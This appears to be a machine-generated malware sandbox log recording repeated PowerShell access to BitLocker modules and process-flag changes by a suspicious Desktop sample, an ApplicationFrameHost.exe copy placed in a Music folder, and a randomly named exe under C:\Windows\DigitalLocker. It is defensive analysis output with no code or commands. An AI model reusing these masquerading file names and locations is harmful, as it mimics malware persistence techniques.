Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
